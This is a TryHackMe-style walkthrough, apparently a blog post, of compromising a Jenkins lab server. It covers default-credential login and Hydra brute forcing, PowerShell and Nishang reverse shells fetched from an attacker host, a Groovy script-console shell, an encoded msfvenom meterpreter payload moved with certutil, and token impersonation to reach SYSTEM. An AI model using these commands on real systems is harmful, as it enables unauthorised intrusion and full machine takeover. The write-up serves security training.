Exploiting Jenkins | Advanced Exploitation | TryHackMe
In this room, we’ll learn how to exploit Jenkins and gain initial access as a user then escalate our privileges by exploiting a common misconfiguration on this widely used automation server(Jenkins — This tool is used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they made changes to it).
Gaining Initial Access
In this section, i will demonstrate 3 ways you could use to gain initial access to the Jenkins server.
To start, we will use Nmap to survey for open ports, their service, version as well as any intresting information we may get.
$nmap -sV -sC -sS -T4 -Pn 10.10.136.50
From our nmap scan, we find 3 open ports in which two look intresting. Port 80 running a http-server & Port 8080 running http-server (Jetty). A close look at both, we find http://10.10.136.50:8080 is a login page to the administrators panel.
We need to brutforce for the password to bypass the login page. But, before bruteforcing for the logins. We try commonly used password, user:user, admin:admin, admin:Pa$$word if none of this yields, we search for jenkins server logins on the internet and if this does not work, we brutforce. In jenkins case, this is an easy pass as the logins admin:admin went through. For the sake of learning, i am going to demonstrate another method to gain access using burp suite and Hydra.
Bruteforce for logins with Burp Suite and Hydra
Both Burp suite and hydra are such a powerful tool and their usefulness cannot be underestimated. Lets begin.
Start the intercept and visit the jenkins address and forward the GET request to with burpsuite to your mozzilla.
Once the request is complete, you get a login page, here write any logins. in my case i used test:test as shown below.
Once we’ve intercepted the failed login request to burp, lets visit the POST http proxy history and send it to intruder where we can set our payload and parameters
on your terminal, use the command below.
hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form
As expected, the password to the username admin is admin
Get a Reverse Shell
Now that we are logged into the admin panel, lets find a feature of the tool that allows you to execute commands on the underlying system then run it.
— — — — -
I will demonstrate 3 ways/types of command you could use to gain a shell.
— — —
Using PowerShell Reverse TCP
This commands are particularly lengthy and memorising them is of no use, so proceed to your browser and sersch for powershell iex reverse shell. You should get results, i normally visit the https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
First we need to install the Powershell Reverse_TCP command script on our working folder, (you could paste the code and edit with nano or install from github script) and rename it powershell_reverse_tcp.ps1
wget https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/invoke_expression/prompt/powershell_reverse_tcp_prompt.ps1
When the script has been downloaded, simply examine the code within it and replace the IP address given there with our local IP address (Kali IP address). Once the changes are done save the file and start the python server as well as netcat.
$python3 -m http.server 80
Time to run the script from your jenkins panel
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3/powershell_reverse_tcp.ps1');powershell_reverse_tcp -Reverse -IPAddress <ip> -PORT <port>
Bingo! we got a connection. now we can easily get the user flag
Get shell with Invoke-PowerShellTcp (Nishang)
We need to install the nishang powershell script on our current working directory, we could use the command below on terminal.
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Now run the command below on your windows command prompt , make sure your LHOST and LPORT are correct. Make sure to start your netcat and server.
powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.1.3/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.3 -Port 4444
There you have your initial access.
Exploiting with Groovy Scripts
Under the manage jenkins, we find an instrsting path called “Script Console” here we can run grovy scripts and get a shell in a heart beat.
Proceed to your broser to check which groovy scripts to use.
input your correct LHOST and LPORT in the fields and run the script on console and get your reverse shell. Note: you wont necessarilly need to start your python3 server in this case.
Spawn a Meterpreter Shell
From here, it only gets interesting.
Now that we’ve started our metersploit, lets generate payload using msfvenom on our kali machine.
msfconsole
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=IP LPORT=PORT -f exe -o shell-name.exe
Once we have our payload shell, we need to transfer it to our windows machine using the certutil tool. First start your webserver on the kali machine and run the command below on your windows shell.
certutil -urlcache -f http://ip:port/shell-name.exe shell-name.exe
Now that our payload has been exported to windows we can proceed to set configure our metasploit. by searching exploit/multi/handler and set payload to windows/meterpreter/reverse_tcp then set your LHOST and Lports accordingly and run the exploit.
This is where things get interesting as to run the exploit we will need to start-process “shell-name” on our windows shell.
Bingo!, we get our meterpreter session. Time to escalate our privillages.
Privilege Escalation
The end goal is to always gain administrator privilleges. To do so we need to migrate to a suitable process. in my case i love migrating to spools service as its much stable process.
Lets load incogito and check for list_token that we can impersonate
>load incognito
We get lots of tokens but we are only interested in one “BUILTIN\Administrators” . this looks like something worth impersonating
once this is done, we are in as NT AUTHORITY\SYSTEM
We are in as Administrator and we can check his files however we want to.
Thank you for taking time to read this walkthrough, we have been able to compromise this machine using metersploit. I will be writing another walkthrough demonstrating how to compromise the same machine manually.
Happy Hacking! Cheers.